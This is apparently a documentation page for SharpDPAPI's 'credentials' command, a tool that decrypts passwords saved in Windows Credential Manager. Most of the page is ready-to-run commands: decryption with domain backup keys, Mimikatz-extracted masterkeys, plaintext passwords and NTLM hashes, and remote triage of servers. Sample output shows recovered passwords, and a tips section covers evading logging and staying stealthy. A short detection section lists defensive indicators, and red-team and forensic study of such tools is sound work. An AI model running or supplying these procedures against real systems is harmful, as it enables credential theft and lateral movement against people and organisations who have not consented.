Skip to main content

Overview

The credentials command searches for Windows Credential Manager credential files and decrypts them using masterkeys, domain backup keys, or user credentials. This reveals saved credentials for RDP connections, scheduled tasks, and other applications.
Credential files are stored in %LOCALAPPDATA%\Microsoft\Credentials\ and contain sensitive information like usernames and passwords for various Windows services.

Basic Usage

# Decrypt with domain backup key
SharpDPAPI.exe credentials /pvk:key.pvk

# Decrypt with masterkey mappings
SharpDPAPI.exe credentials {GUID1}:SHA1 {GUID2}:SHA1

# Decrypt with user password
SharpDPAPI.exe credentials /password:Password123!

# Target specific credential file
SharpDPAPI.exe credentials /target:FILE {GUID}:SHA1

Command Arguments

Decryption Methods

  • Domain Backup Key
  • Masterkey Mappings
  • User Credentials
  • RPC Decryption
# Base64-encoded key
SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...

# Key file
SharpDPAPI.exe credentials /pvk:key.pvk
First decrypts user masterkeys, then uses them to decrypt credential files.

Targeting Options

ArgumentDescription
/target:FILETarget specific credential file
/target:FOLDERTarget specific folder of credentials
/server:SERVERTriage remote server (requires admin access + pvk/password)
When using /target:FILE, you must provide :SHA1 masterkey mappings. When using /target:FOLDER with masterkeys, the folder must also contain the DPAPI masterkey files.

Execution Context

  • Elevated
  • Unelevated
When run with administrative privileges:
  • Triages all users on the system
  • Accesses credential files in all user profiles
  • Maximum credential recovery

Example: Using Masterkey Mappings

SharpDPAPI.exe credentials {44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903...
Output: 
[*] Action: User DPAPI Credential Triage

[*] Triaging Credentials for ALL users

Folder       : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\

  CredFile           : 48C08A704ADBA03A93CD7EC5B77C0EAB

    guidMasterKey    : {885342c6-028b-4ecf-82b2-304242e769e0}
    size             : 436
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772/26115
    description      : Local Credential Data

    LastWritten      : 1/22/2019 2:44:40 AM
    TargetName       : Domain:target=TERMSRV/10.4.10.101
    TargetAlias      :
    Comment          :
    UserName         : DOMAIN\user
    Credential       : Password!
Get masterkey mappings using Mimikatz’s sekurlsa::dpapi command or SharpDPAPI’s masterkeys command.

Example: Using Domain Backup Key

SharpDPAPI.exe credentials /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...
Output: 
[*] Action: User DPAPI Credential Triage

[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!

[*] User master key cache:

{42e95117-ff5f-40fa-a6fc-87584758a479}:4C802894C566B235B7F34B011316E94CC4CE4665
{feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903a9b61c42e6c9ab0f4

[*] Triaging Credentials for ALL users

Folder       : C:\Users\harmj0y\AppData\Local\Microsoft\Credentials\

  CredFile           : 48C08A704ADBA03A93CD7EC5B77C0EAB

    guidMasterKey    : {885342c6-028b-4ecf-82b2-304242e769e0}
    size             : 436
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32772/26115
    description      : Local Credential Data

    LastWritten      : 1/22/2019 2:44:40 AM
    TargetName       : Domain:target=TERMSRV/10.4.10.101
    TargetAlias      :
    Comment          :
    UserName         : DOMAIN\user
    Credential       : Password!

Types of Credentials Found

The credentials command can reveal various types of saved credentials:
  • TargetName: Domain:target=TERMSRV/IP_OR_HOSTNAME
  • Contains saved Remote Desktop connection credentials
  • Stored when users save RDP passwords
  • TargetName: Domain:batch=TaskScheduler:Task:{GUID}
  • Credentials for scheduled tasks running as specific users
  • High-value targets for persistence
  • Service account credentials
  • RunAs credentials for applications
  • Network authentication credentials
  • Application-specific saved credentials
  • Network share credentials
  • Other Windows Credential Manager entries

Common Scenarios

After obtaining domain admin and the backup key:
# 1. Retrieve backup key
SharpDPAPI.exe backupkey /file:key.pvk

# 2. Decrypt credentials locally
SharpDPAPI.exe credentials /pvk:key.pvk

# 3. Decrypt credentials on remote systems
SharpDPAPI.exe credentials /pvk:key.pvk /server:fileserver.domain.com
SharpDPAPI.exe credentials /pvk:key.pvk /server:workstation.domain.com
Extract masterkeys with Mimikatz and use for decryption:
# 1. In Mimikatz
# mimikatz# privilege::debug
# mimikatz# sekurlsa::dpapi

# 2. Format as {GUID}:SHA1 {GUID}:SHA1
# 3. Run SharpDPAPI
SharpDPAPI.exe credentials {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd... {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad...
When you have compromised a user’s password:
# Using plaintext password
SharpDPAPI.exe credentials /password:Password123!

# Using NTLM hash
SharpDPAPI.exe credentials /ntlm:8846F7EAEE8FB117AD06BDD830B7586C
Analyzing copied credential files:
# Target specific folder with masterkeys
SharpDPAPI.exe credentials /target:C:\Evidence\Credentials\ /pvk:key.pvk

# Target specific file with known masterkey
SharpDPAPI.exe credentials /target:C:\Evidence\48C08A704ADBA03A93CD7EC5B77C0EAB {885342c6-028b-4ecf-82b2-304242e769e0}:SHA1...

Credential File Structure

Credential files are located at: 
%LOCALAPPDATA%\Microsoft\Credentials\<RANDOM_HEX_NAME>
Each file contains:
  • guidMasterKey: GUID of masterkey used for encryption
  • Description: Type of credential data
  • TargetName: What the credential is for
  • UserName: Stored username
  • Credential: Encrypted password (decrypted by SharpDPAPI)

Detection Considerations

Accessing credential files can trigger security monitoring and EDR alerts.
Host-Based Indicators:
  • Reading files from %LOCALAPPDATA%\Microsoft\Credentials\
  • Non-standard processes accessing Credential Manager files
  • Bulk enumeration of credential files across multiple user profiles
  • Access from unauthorized processes
Defensive Monitoring:
  • Monitor access to %LOCALAPPDATA%\Microsoft\Credentials\ directories
  • Alert on bulk credential file access
  • Track processes reading multiple users’ credential data
  • Detect credential file access outside user context
  • Monitor for LSASS access (when extracting masterkeys)
Event Log Indicators: 
Event ID: 4663 (File Access)
Object Name: *\Microsoft\Credentials\*
Process Name: SharpDPAPI.exe or suspicious processes

masterkeys

Decrypt user masterkeys first

vaults

Decrypt Windows Vault data

triage

Comprehensive user DPAPI triage

backupkey

Retrieve domain backup key

Tips

  • Run elevated to access all users’ credentials
  • Use domain backup key for comprehensive coverage
  • Check both current and archived credential files
  • Correlate TargetName with network infrastructure
  • Pay special attention to scheduled task credentials
  • Run unelevated to only access current user (less noisy)
  • Use /mkfile instead of inline masterkeys to avoid command line logging
  • Redirect output to file with /consoleoutfile to minimize artifacts
  • Target specific credential files if you know what you’re looking for
  • Avoid bulk enumeration if stealth is required
No credentials decrypted:
  • Verify masterkeys or backup key is correct
  • Ensure credential files exist in target directories
  • Check that you have read permissions
  • Confirm the GUID in credential file matches your masterkeys
Partial decryption:
  • Users may have credentials encrypted with different masterkeys
  • Extract more masterkeys using Mimikatz sekurlsa::dpapi
  • Try using domain backup key for complete coverage
  • Check for older/archived masterkey files